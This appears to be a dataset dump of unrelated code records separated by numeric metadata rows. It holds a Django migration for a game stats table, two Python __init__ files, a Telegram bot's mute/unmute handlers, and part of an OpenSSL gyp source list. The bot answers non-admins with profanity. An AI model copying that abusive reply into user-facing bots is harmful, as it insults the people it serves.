                ('fiveseven', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('tec9', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('cz75a', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('revolver', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('nova', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('xm1014', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('mag7', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('sawedoff', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('bizon', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('mac10', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('mp9', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('mp7', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('ump45', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('p90', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('galilar', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('ak47', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('scar20', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('famas', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('m4a1', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('m4a1_silencer', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('aug', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('ssg08', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('sg556', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('awp', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('g3sg1', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('m249', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('negev', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('hegrenade', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('flashbang', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('smokegrenade', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('inferno', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('decoy', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('taser', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('mp5sd', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('breachcharge', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('head', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('chest', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('stomach', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('left_arm', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('right_arm', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('left_leg', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('right_leg', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('c4_planted', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('c4_exploded', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('c4_defused', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('ct_win', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('tr_win', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('hostages_rescued', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('vip_killed', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('vip_escaped', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('vip_played', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('mvp', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('damage', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('match_win', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('match_draw', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('match_lose', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('first_blood', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('no_scope', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('no_scope_dis', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
            ],
            options={
                'db_table': 'rankme',
                'abstract': False,
                'managed': False,
            },
        ),
    ]
| 64.539961
| 119
| 0.577456
| 3,424
| 33,109
| 5.44597
| 0.093458
| 0.11101
| 0.194884
| 0.228777
| 0.853113
| 0.806457
| 0.704832
| 0.683166
| 0.683166
| 0.653724
| 0
| 0.031216
| 0.269504
| 33,109
| 512
| 120
| 64.666016
| 0.739767
| 0.001359
| 0
| 0.605941
| 1
| 0
| 0.091313
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00198
| 0
| 0.009901
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5227bc7e5082f8e01ba0598829f78d2c9bde3540
| 74
|
py
|
Python
|
src/synapse_downloader/download/__init__.py
|
pcstout/synapse-downloader
|
3c9a6511aa9909929358213bbc0190afa9916846
|
[
"Apache-2.0"
] | null | null | null |
src/synapse_downloader/download/__init__.py
|
pcstout/synapse-downloader
|
3c9a6511aa9909929358213bbc0190afa9916846
|
[
"Apache-2.0"
] | 11
|
2020-03-24T18:00:12.000Z
|
2022-03-01T14:02:16.000Z
|
src/synapse_downloader/download/__init__.py
|
ki-tools/synapse-downloader
|
3c9a6511aa9909929358213bbc0190afa9916846
|
[
"Apache-2.0"
] | 1
|
2019-10-03T22:30:45.000Z
|
2019-10-03T22:30:45.000Z
|
from .downloader import Downloader
from .downloader import FileHandleView
| 24.666667
| 38
| 0.864865
| 8
| 74
| 8
| 0.5
| 0.4375
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 74
| 2
| 39
| 37
| 0.969697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
525fdda940dd2f25829da4df31b27fa7e3e98931
| 5,123
|
py
|
Python
|
mute.py
|
CrEaTiiOn187/tg-management-bot
|
554dbdd2134c14466baff3f3d448ac66f54ced03
|
[
"MIT"
] | 3
|
2021-10-21T18:16:37.000Z
|
2022-03-10T18:24:55.000Z
|
mute.py
|
NoodleSoup/tg-management-bot
|
554dbdd2134c14466baff3f3d448ac66f54ced03
|
[
"MIT"
] | null | null | null |
mute.py
|
NoodleSoup/tg-management-bot
|
554dbdd2134c14466baff3f3d448ac66f54ced03
|
[
"MIT"
] | 1
|
2020-07-15T07:43:55.000Z
|
2020-07-15T07:43:55.000Z
|
def mute(bot, update):
    """Handle the /mute command: restrict the member quoted by a reply.

    Must be invoked by a chat administrator/creator as a reply to the
    target user's message.  ``/mute <seconds>`` applies a temporary
    restriction; bare ``/mute`` restricts indefinitely.

    Args:
        bot: Telegram bot client exposing ``send_message``,
            ``get_chat_member`` and ``restrict_chat_member``.
        update: incoming update whose ``.message`` is the command message.
    """
    from chats_data import chats_data
    import time
    msg = update.message
    chat_id = msg.chat_id

    def _reply(text):
        # Markdown-formatted answer to the invoking message.
        bot.send_message(chat_id=msg.chat_id,
                         text=text,
                         reply_to_message_id=msg.message_id,
                         parse_mode='Markdown')

    def _announce(text):
        # Plain-text answer (usernames may contain Markdown-breaking chars).
        bot.send_message(chat_id=msg.chat_id,
                         text=text,
                         reply_to_message_id=msg.message_id)

    # Plugin must be enabled for this chat.
    if not chats_data.get(chat_id, None) or not chats_data[chat_id].get('mute', None):
        _reply("The /mute plugin is disabled. You can enable it using `/enable mute` or by /plugins.")
        return

    user = bot.get_chat_member(chat_id=chat_id, user_id=msg.from_user.id)['status']
    try:
        muted = bot.get_chat_member(chat_id=chat_id,
                                    user_id=msg.reply_to_message.from_user.id)['status']
    except Exception:  # no reply_to_message (AttributeError) or API lookup failure
        _reply("Please reply to the person you want to mute.")
        return

    if user in ("administrator", "creator"):
        if muted == 'member':
            parts = msg.text.split(" ", 1)
            if len(parts) > 1:
                try:
                    seconds = int(parts[1])
                except ValueError:
                    _reply("*Format:*\n_/mute time (in seconds)_")
                    return
                ok = bot.restrict_chat_member(chat_id=chat_id,
                                              user_id=msg.reply_to_message.from_user.id,
                                              until_date=int(time.time()) + seconds,
                                              can_send_messages=False)
                if ok:
                    _announce(f"Restricted @{msg.reply_to_message.from_user.username} for {seconds} seconds.")
                else:
                    _reply("Couldn't restrict. Maybe I'm not admin...")
            else:
                # No duration given: restrict until manually lifted.
                ok = bot.restrict_chat_member(chat_id=chat_id,
                                              user_id=msg.reply_to_message.from_user.id,
                                              can_send_messages=False)
                if ok:
                    _announce(f"Restricted @{msg.reply_to_message.from_user.username}")
                else:
                    _reply("Couldn't restrict. Maybe I'm not admin...")
        elif muted in ('left', 'kicked'):
            _reply("The person is not in the chat anymore.")
        elif muted in ('administrator', 'creator'):
            _reply("I wish I could restrict admins.")
        elif muted == 'restricted':
            _reply("User is already restricted.")
    else:
        _reply("Fuck off, you aren't admin.")
def unmute(bot, update):
    """Handle the /unmute command: lift restrictions from a quoted member.

    Must be invoked by a chat administrator/creator as a reply to the
    target user's message; re-grants all send permissions.

    Args:
        bot: Telegram bot client exposing ``send_message``,
            ``get_chat_member`` and ``restrict_chat_member``.
        update: incoming update whose ``.message`` is the command message.
    """
    from chats_data import chats_data
    msg = update.message
    chat_id = msg.chat_id

    def _reply(text):
        # Markdown-formatted answer to the invoking message.
        bot.send_message(chat_id=msg.chat_id,
                         text=text,
                         reply_to_message_id=msg.message_id,
                         parse_mode='Markdown')

    # Plugin must be enabled for this chat (shared toggle with /mute).
    if not chats_data.get(chat_id, None) or not chats_data[chat_id].get('mute', None):
        _reply("The /mute plugin is disabled. You can enable it using `/enable mute` or by /plugins.")
        return

    user = bot.get_chat_member(chat_id=chat_id, user_id=msg.from_user.id)['status']
    try:
        muted = bot.get_chat_member(chat_id=chat_id,
                                    user_id=msg.reply_to_message.from_user.id)['status']
    except Exception:  # no reply_to_message (AttributeError) or API lookup failure
        _reply("Please reply to the person you want to unmute.")
        return

    if user in ("administrator", "creator"):
        if muted == 'restricted':
            # Restore every send permission the restrict call can revoke.
            ok = bot.restrict_chat_member(chat_id=chat_id,
                                          user_id=msg.reply_to_message.from_user.id,
                                          can_send_messages=True,
                                          can_send_media_messages=True,
                                          can_send_other_messages=True,
                                          can_add_web_page_previews=True)
            if ok:
                bot.send_message(chat_id=msg.chat_id,
                                 text=f"Unrestricted @{msg.reply_to_message.from_user.username}",
                                 reply_to_message_id=msg.message_id)
            else:
                _reply("Couldn't unrestrict. Maybe I'm not admin...")
        else:
            _reply("The user isn't restricted.")
    else:
        _reply("Fuck off, you aren't admin.")
| 40.65873
| 228
| 0.657232
| 759
| 5,123
| 4.134387
| 0.1278
| 0.107075
| 0.111536
| 0.096877
| 0.886233
| 0.886233
| 0.886233
| 0.886233
| 0.881772
| 0.860739
| 0
| 0.000763
| 0.232676
| 5,123
| 125
| 229
| 40.984
| 0.797507
| 0
| 0
| 0.794872
| 0
| 0.017094
| 0.203281
| 0.02521
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017094
| false
| 0
| 0.034188
| 0
| 0.094017
| 0.008547
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5263cd82bf7c456c17f09f6d6f74cdc30049339a
| 141
|
py
|
Python
|
iot_api/user_api/events/__init__.py
|
dolfandringa/rolaguard_backend
|
d4df7b55fc001aa6e0499edcfa94bf1b1c63b084
|
[
"Apache-2.0"
] | null | null | null |
iot_api/user_api/events/__init__.py
|
dolfandringa/rolaguard_backend
|
d4df7b55fc001aa6e0499edcfa94bf1b1c63b084
|
[
"Apache-2.0"
] | 7
|
2020-05-05T20:10:59.000Z
|
2021-05-26T17:59:24.000Z
|
iot_api/user_api/events/__init__.py
|
dolfandringa/rolaguard_backend
|
d4df7b55fc001aa6e0499edcfa94bf1b1c63b084
|
[
"Apache-2.0"
] | 1
|
2021-01-28T05:54:11.000Z
|
2021-01-28T05:54:11.000Z
|
import iot_api.user_api.events.alert_events
import iot_api.user_api.events.data_collector_events
import iot_api.user_api.events.policy_events
| 47
| 52
| 0.900709
| 25
| 141
| 4.68
| 0.36
| 0.230769
| 0.307692
| 0.410256
| 0.74359
| 0.74359
| 0.529915
| 0
| 0
| 0
| 0
| 0
| 0.035461
| 141
| 3
| 53
| 47
| 0.860294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
5264a9b5124c1c35ef1340404962451657792217
| 48,131
|
gyp
|
Python
|
library/openssl/1.0.1m.gyp
|
KjellSchubert/bru
|
dd70b721d07fbd27c57c845cc3a29cd8f2dfc587
|
[
"MIT"
] | 3
|
2015-01-06T15:22:16.000Z
|
2015-11-27T18:13:04.000Z
|
library/openssl/1.0.1m.gyp
|
KjellSchubert/bru
|
dd70b721d07fbd27c57c845cc3a29cd8f2dfc587
|
[
"MIT"
] | 7
|
2015-02-10T15:13:38.000Z
|
2021-05-30T07:51:13.000Z
|
library/openssl/1.0.1m.gyp
|
KjellSchubert/bru
|
dd70b721d07fbd27c57c845cc3a29cd8f2dfc587
|
[
"MIT"
] | 3
|
2015-01-29T17:19:53.000Z
|
2016-01-06T12:50:06.000Z
|
{
"targets": [
{
# OpenSSL has a lot of config options, with some default options
# enabling known insecure algorithms. What's a good combinations
# of openssl config options?
# ./config no-asm no-shared no-ssl2 no-ssl3 no-hw no-zlib no-threads
# ?
# See also http://codefromthe70s.org/sslimprov.aspx
"target_name": "openssl",
"type": "static_library",
# The list of sources I computed on Windows via:
# >cd bru_modules\openssl\1.0.1m\openssl-1.0.1m
# >perl Configure VC-WIN32 no-asm no-ssl2 no-ssl3 no-hw
# >call ms\\do_ms.bat
# >nmake /n /f ms\nt.mak > nmake.log
# >cd bru_modules\openssl # where the *.gyp is located
# >~\bru\makefile2gyp.py 1.0.1m\openssl-1.0.1m\nmake.log
"sources": [
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_cbc.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_cfb.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_core.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_ctr.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_ecb.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_ige.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_misc.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_ofb.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_wrap.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_bitstr.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_bool.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_bytes.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_d2i_fp.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_digest.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_dup.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_enum.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_gentm.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_i2d_fp.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_int.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_mbstr.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_object.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_octet.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_print.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_set.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_sign.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_strex.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_strnid.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_time.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_type.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_utctm.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_utf8.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_verify.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/ameth_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/asn1_err.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/asn1_gen.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/asn1_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/asn1_par.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/asn_mime.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/asn_moid.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/asn_pack.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/bio_asn1.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/bio_ndef.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/d2i_pr.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/d2i_pu.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/evp_asn1.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/f_enum.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/f_int.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/f_string.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/i2d_pr.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/i2d_pu.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/n_pkey.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/nsseq.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/p5_pbe.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/p5_pbev2.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/p8_pkey.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/t_bitst.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/t_crl.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/t_pkey.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/t_req.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/t_spki.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/t_x509.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/t_x509a.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/tasn_dec.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/tasn_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/tasn_fre.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/tasn_new.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/tasn_prn.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/tasn_typ.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/tasn_utl.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_algor.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_attrib.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_bignum.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_crl.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_exten.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_info.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_long.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_name.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_nx509.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_pkey.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_pubkey.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_req.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_sig.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_spki.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_val.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_x509.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_x509a.c",
"1.0.1m/openssl-1.0.1m/crypto/bf/bf_cfb64.c",
"1.0.1m/openssl-1.0.1m/crypto/bf/bf_ecb.c",
"1.0.1m/openssl-1.0.1m/crypto/bf/bf_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/bf/bf_ofb64.c",
"1.0.1m/openssl-1.0.1m/crypto/bf/bf_skey.c",
"1.0.1m/openssl-1.0.1m/crypto/bf/bftest.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/b_dump.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/b_print.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/b_sock.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bf_buff.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bf_nbio.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bf_null.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bio_cb.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bio_err.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bio_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_acpt.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_bio.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_conn.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_dgram.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_fd.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_file.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_log.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_mem.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_null.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_sock.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_add.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_asm.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_blind.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_const.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_ctx.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_depr.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_div.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_err.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_exp.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_exp2.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_gcd.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_gf2m.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_kron.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_mod.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_mont.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_mpi.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_mul.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_nist.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_prime.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_print.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_rand.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_recp.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_shift.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_sqr.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_sqrt.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_word.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_x931p.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bntest.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/exptest.c",
"1.0.1m/openssl-1.0.1m/crypto/buffer/buf_err.c",
"1.0.1m/openssl-1.0.1m/crypto/buffer/buf_str.c",
"1.0.1m/openssl-1.0.1m/crypto/buffer/buffer.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/camellia.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/cmll_cbc.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/cmll_cfb.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/cmll_ctr.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/cmll_ecb.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/cmll_misc.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/cmll_ofb.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/cmll_utl.c",
"1.0.1m/openssl-1.0.1m/crypto/cast/c_cfb64.c",
"1.0.1m/openssl-1.0.1m/crypto/cast/c_ecb.c",
"1.0.1m/openssl-1.0.1m/crypto/cast/c_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/cast/c_ofb64.c",
"1.0.1m/openssl-1.0.1m/crypto/cast/c_skey.c",
"1.0.1m/openssl-1.0.1m/crypto/cast/casttest.c",
"1.0.1m/openssl-1.0.1m/crypto/cmac/cm_ameth.c",
"1.0.1m/openssl-1.0.1m/crypto/cmac/cm_pmeth.c",
"1.0.1m/openssl-1.0.1m/crypto/cmac/cmac.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_asn1.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_att.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_cd.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_dd.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_env.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_err.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_ess.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_io.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_pwri.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_sd.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_smime.c",
"1.0.1m/openssl-1.0.1m/crypto/comp/c_rle.c",
"1.0.1m/openssl-1.0.1m/crypto/comp/c_zlib.c",
"1.0.1m/openssl-1.0.1m/crypto/comp/comp_err.c",
"1.0.1m/openssl-1.0.1m/crypto/comp/comp_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/conf/conf_api.c",
"1.0.1m/openssl-1.0.1m/crypto/conf/conf_def.c",
"1.0.1m/openssl-1.0.1m/crypto/conf/conf_err.c",
"1.0.1m/openssl-1.0.1m/crypto/conf/conf_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/conf/conf_mall.c",
"1.0.1m/openssl-1.0.1m/crypto/conf/conf_mod.c",
"1.0.1m/openssl-1.0.1m/crypto/conf/conf_sap.c",
"1.0.1m/openssl-1.0.1m/crypto/constant_time_test.c",
"1.0.1m/openssl-1.0.1m/crypto/cpt_err.c",
"1.0.1m/openssl-1.0.1m/crypto/cryptlib.c",
"1.0.1m/openssl-1.0.1m/crypto/cversion.c",
"1.0.1m/openssl-1.0.1m/crypto/des/cbc_cksm.c",
"1.0.1m/openssl-1.0.1m/crypto/des/cbc_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/cfb64ede.c",
"1.0.1m/openssl-1.0.1m/crypto/des/cfb64enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/cfb_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/des_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/des_old.c",
"1.0.1m/openssl-1.0.1m/crypto/des/des_old2.c",
